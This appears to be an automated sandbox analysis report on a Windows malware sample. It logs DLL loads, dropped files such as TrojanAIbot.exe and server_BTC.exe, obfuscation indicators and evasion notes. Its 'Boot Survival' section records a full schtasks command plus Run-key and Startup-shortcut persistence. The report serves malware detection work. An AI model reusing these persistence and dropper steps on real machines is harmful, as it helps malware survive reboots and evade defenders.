Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: version.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: url.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: dbghelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mpr.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ntmarta.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: TrojanAIbot.exe.lnk.10.dr LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: 2jbMIxCFsK.exe Static file information: File size 1392640 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2167425399.000000002BD60000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbH source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D67000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002226F000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2143795019.000000002223E000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2166786184.0000000002226000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2139143163.0000000005050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000005.00000003.2144839901.0000000004A20000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 0.2.2jbMIxCFsK.exe.2e60000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2050057116.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: lxsyrsiW.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02E7894C
Source: Wisrysxl.PIF.6.dr Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: 2jbMIxCFsK.exe Static PE information: real checksum: 0x0 should be: 0x15c6e6
Source: neworigin.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x480db
Source: armsvc.exe.8.dr Static PE information: real checksum: 0x32318 should be: 0x14991f
Source: lxsyrsiW.pif.0.dr Static PE information: real checksum: 0x0 should be: 0x1768a
Source: TrojanAIbot.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: server_BTC.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x42478
Source: alpha.pif.4.dr Static PE information: section name: .didat
Source: armsvc.exe.8.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D2FC push 02E8D367h; ret 0_2_02E8D35F
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E663AE push 02E6640Bh; ret 0_2_02E66403
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E663B0 push 02E6640Bh; ret 0_2_02E66403
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8C378 push 02E8C56Eh; ret 0_2_02E8C566
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6C349 push 8B02E6C1h; ret 0_2_02E6C34E
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6332C push eax; ret 0_2_02E63368
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D0AC push 02E8D125h; ret 0_2_02E8D11D
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7306C push 02E730B9h; ret 0_2_02E730B1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7306B push 02E730B9h; ret 0_2_02E730B1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D1F8 push 02E8D288h; ret 0_2_02E8D280
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8D144 push 02E8D1ECh; ret 0_2_02E8D1E4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7F108 push ecx; mov dword ptr [esp], edx 0_2_02E7F10D
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E66784 push 02E667C6h; ret 0_2_02E667BE
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E66782 push 02E667C6h; ret 0_2_02E667BE
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6D5A0 push 02E6D5CCh; ret 0_2_02E6D5C4
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6C56C push ecx; mov dword ptr [esp], edx 0_2_02E6C571
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E8C570 push 02E8C56Eh; ret 0_2_02E8C566
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7AAE0 push 02E7AB18h; ret 0_2_02E7AB10
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E78AD8 push 02E78B10h; ret 0_2_02E78B08
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6CA4E push 02E6CD72h; ret 0_2_02E6CD6A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E6CBEC push 02E6CD72h; ret 0_2_02E6CD6A
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7886C push 02E788AEh; ret 0_2_02E788A6
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02ED4850 push eax; ret 0_2_02ED4920
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E76946 push 02E769F3h; ret 0_2_02E769EB
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E76948 push 02E769F3h; ret 0_2_02E769EB
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7790C push 02E77989h; ret 0_2_02E77981
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E75E7C push ecx; mov dword ptr [esp], edx 0_2_02E75E7E
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E72F60 push 02E72FD6h; ret 0_2_02E72FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Code function: 9_2_009E0C55 push edi; retf 9_2_009E0C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_0306632D push eax; ret 11_2_03066341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_03063A9C push ebx; retf 11_2_03063ADA

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Wisrysxl.PIF
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe File created: C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\neworigin.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Users\Public\Libraries\lxsyrsiW.pif File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Boot Survival

Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 02:18 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Code function: 0_2_02E7AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02E7AB1C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DA0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DA1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DCD000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DCE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2E24000 memory commit 501014528
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F1C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2F1E000 memory commit 500015104
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DB0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DB1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DDD000 memory commit 500002816
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2DDE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Memory allocated: 2E34000 memory commit 501014528
